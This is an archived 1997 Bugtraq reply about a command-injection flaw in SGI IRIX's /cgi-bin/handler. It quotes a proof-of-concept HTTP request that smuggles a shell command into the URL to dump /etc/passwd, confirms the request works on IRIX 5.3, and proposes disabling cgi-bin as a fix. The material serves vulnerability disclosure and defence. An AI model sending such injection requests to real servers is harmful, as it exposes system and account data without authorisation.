[4702] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Bug in SGI's /cgi-bin/handler

daemon@ATHENA.MIT.EDU (Yaron Yanay)
Mon Jun 16 18:09:03 1997

Date: 	Sun, 15 Jun 1997 13:49:01 +0300
Reply-To: yarony@vipe.technion.ac.il
From: Yaron Yanay <yarony@VIPE.TECHNION.AC.IL>
X-To:         Razvan Dragomirescu <drazvan@kappa.ro>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.3.95.970615002428.6328A-100000@pop3.kappa.ro>

On Sun, 15 Jun 1997, Razvan Dragomirescu wrote:
:The way to exploit this "feature" for cgi-bin/handler is:

:telnet target.machine.com 80
:GET /cgi-bin/handler/useless_shit;cat   /etc/passwd|?data=Download
:HTTP/1.0

:I tested it on two Indy machines with IRIX 6.2. I would appreciate any
:feedback from you.

It worked on my IRIX 5.3 machines.
my fix: chmod 0 /var/www/cgi-bin
        Yaron.
                           \\\|///
                         \\  - -  //
                          (  @ @  )
+-----------------------oOOo-(_)-oOOo-------------+
| Yaron Yanay.  email:yarony@yarony.il.eu.org     |
|                     yarony@tx.technion.ac.il    |
|               http://www.technion.ac.il/~yarony |
|               http://yarony.il.eu.org           |
+-------------------------------Oooo--------------+
                         oooO   (   )
                        (   )    ) /
                         \ (    (_/
                          \_)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[4702] in bugtraq

Re: Bug in SGI's /cgi-bin/handler

daemon@ATHENA.MIT.EDU (Yaron Yanay)Mon Jun 16 18:09:03 1997

daemon@ATHENA.MIT.EDU (Yaron Yanay)
Mon Jun 16 18:09:03 1997